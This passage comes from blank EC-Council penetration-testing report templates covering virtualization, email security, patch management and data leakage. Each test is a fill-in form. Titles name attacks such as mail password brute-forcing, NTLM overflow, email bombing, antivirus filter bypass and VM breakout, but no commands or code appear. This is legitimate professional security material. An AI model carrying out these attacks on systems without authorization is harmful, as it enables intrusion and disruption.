Information Gathered from the Host Operating System's Virtual NIC on the Untrusted Network
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 8: Check the network bandwidth limit per VM

Target Organization
URL
Outbound Traffic From a Virtual Machine Inbound Traffic To a Virtual Machine

Average Size: Average Size:

Peak Size: Peak Size:

Burst Size: Burst Size:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 9: Check virtual switches for promiscuous mode

Target Organization
URL
Promiscuous Mode Enabled on Virtual Switches and on Virtual Distributed Switches Yes No
Enabled ESX Hypervisor True False
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 10: Perform virtual machine stress testing

Target Organization
URL
Memory Reliability
Input/output
Performance of VMs
Network
Performance of the
Virtual Machines
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 11: Try to exploit hypervisors using automated exploit tools

Target Organization
URL
Exploited
Hypervisors
Results of the Exploit
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 12: Try to break out of guest VM

Target Organization
URL
Host Operating
System
Guest Virtual
Machine
Exploited VMware
Workstation
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 13: Perform vulnerability assessment of virtual environment

Target Organization
URL
Findings from 1.
Vulnerability 2.
Assessment of
Virtual Environment 3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Methodology: Email Security Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template ESPT/32



Test 1: Perform SMTP service fingerprinting

Target Organization
URL
Email System 1.
Security Auditing 2.
Begins
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2: Perform directory harvest attacks

Target Organization
URL
Directory harvest 1.
attack (DHA) is 2.
Commonly Used to
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3: Enumerate enabled SMTP subsystems and features

Target Organization
URL
Enabling SMTP 1.
Subsystems and 2.
Features
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 4: Perform SMTP password brute-forcing

Target Organization
URL
Find out Possible 1.
Vulnerabilities in the 2.
SMTP Server
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 5: Perform NTLM overflows attack through SMTP authentication

Target Organization
URL
What is NTLM (NT 1.
LAN Manager) 2.
Authentication
Mechanism 3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 6: Test for SMTP open relay

Target Organization
URL
Check with the SMTP 1.
Server Configuration 2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 7: Perform SMTP user enumeration

Target Organization
URL
RCPT TO: and VRFY 1.
Commands can be 2.
used for
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 8: Perform POP3 password brute-forcing

Target Organization:
URL:
Find POP3 Services Using Weak Passwords:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 9: Perform IMAP brute-forcing

Target Organization:
URL:
Perform the Authentication Process with the Brute-Forcing Method:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 10: Test for IMAP process manipulation attack

Target Organization:
URL:
How to Escalate Authentication and Post-Authentication:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 11: Check for known vulnerabilities in mail servers and hosts

Target Organization:
URL:
Find the Vulnerable Hosts and Mail Servers:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 12: Check the patch status of mail server and host systems

Target Organization:
URL:
Check Whether All Hosts in the Target Network Are Fully Patched:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 13: Try to crack email passwords

Target Organization:
URL:
Note Down the Cracked Email Addresses and Passwords:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 14: Check whether anti-phishing software is enabled

Target Organization:
URL:
Anti-Phishing Software Is Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 15: Check whether anti-spamming tools are enabled

Target Organization:
URL:
Anti-Spamming Tools Are Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 16: Try to perform email bombing

Target Organization:
URL:
Perform Email Bombing and List the Unwanted Emails You Have Discovered:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 17: Perform CLSID extension vulnerability test

Target Organization:
URL:
Check Whether CLSID Extensions Are Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 18: Perform VBS attachment vulnerability test

Target Organization:
URL:
Find Visual Basic Script (VBS) Attachment Vulnerabilities:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 19: Perform double file extension vulnerability test

Target Organization:
URL:
What Are .vbs File Extensions:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 20: Perform long file name vulnerability test

Target Organization:
URL:
Check Long File Name Vulnerabilities:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 21: Perform malformed file extension vulnerability test

Target Organization:
URL:
Try to Read the .HTA File in Your Mail Attachment:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 22: Perform access exploit vulnerability test

Target Organization:
URL:
Check VBA (Visual Basic for Applications) Code and Find the Vulnerabilities:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 23: Perform fragmented message vulnerability test

Target Organization:
URL:
How to Bypass the Anti-Virus Filters:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 24: Perform long subject attachment checking test

Target Organization:
URL:
Find the Vulnerabilities of Long Subject Attachments:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 25: Perform no file attachment vulnerability test

Target Organization:
URL:
Access the Mailbox by Sending Mail for the Vulnerability Test:
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

EC-Council Licensed Penetration Tester

Methodology: Security Patches Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template SPPT/33


Test 1: Check if organization has a PVG in place

Target Organization:
URL:
PVG Team Addresses and Helps In:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 2: Check whether the security environment is updated

Target Organization:
URL:
Check the Security Environment:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 3: Check whether the organization uses automated patch management tools

Target Organization:
URL:
Check Whether Automated Patch Management Tools Are Regularly Updated: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 4: Check the last dates/timing process of patch management

Target Organization:
URL:
Explain the Process of Patch Management:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 5: Check the patches on non-production systems

Target Organization:
URL:
Installing Patches on Non-Production Systems:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 6: Check the vendor authentication mechanism

Target Organization:
URL:
Find the Authentication Method of Downloaded Patches:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 7: Check the probability of patches containing malicious code

Target Organization:
URL:
Run an Anti-Virus Tool on the Downloaded Patch:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 8: Check for dependency of new patches

Target Organization:
URL:
Check Whether Newly Installed Patches Are Compromising or Conflicting:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 9: Check the compliance of change management

Target Organization:
URL:
How to Check That Standard Configurations Are Deployed:
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

EC-Council Licensed Penetration Tester

Methodology: Data Leakage Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template DLPT/34


Test 1: Check the physical availability of USB devices

Target Organization:
URL:
Physical Availability of USB Devices in Device Manager:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 2: Check whether the USB drive is enabled

Target Organization:
URL:
USB Drive Is Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 3: Try to enable USB

Target Organization:
URL:
Enabling USB Devices:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 4: Check whether the USB asks for password

Target Organization:
URL:
Check Whether the Device Asks for Authentication: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 5: Check whether Bluetooth is enabled

Target Organization:
URL:
Check Whether Bluetooth Is Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 6: Check if FireWire is enabled

Target Organization:
URL:
Check Whether the FireWire Port Is Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 7: Check if the FTP ports 21 and 22 are enabled

Target Organization:
URL:
Check Whether the FTP Ports Are Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 8: Check whether any memory slot is available and enabled in systems

Target Organization:
URL:
Check Whether Any Memory Slot Is Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 9: Check whether employees are using camera devices within the restricted areas

Target Organization:
URL:
Illegal Use of Camera Devices Leads To:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 10: Check whether systems have any camera driver installed

Target Organization:
URL:
Check Whether Any Camera Driver Is Installed on the Systems: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 11: Check whether anti-spyware and anti-trojans are enabled

Target Organization:
URL:
Anti-Spyware and Anti-Trojans Are Enabled: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 12: Check whether the encrypted data can be decrypted

Target Organization:
URL:
Data Encryption Techniques Protect:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 13: Check if the internal hardware components are locked

Target Organization:
URL:
Internal Hardware Components Are Locked: Yes / No
Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:

Test 14: Check whether size of mail and mail attachments is restricted

Target Organization:
URL:
Restrict the Size Limits for Mail and Mail Attachments:
1.
2.
3.
4.
5.

Tools/Services Used:
1.
2.
3.
4.
5.

Results Analysis:
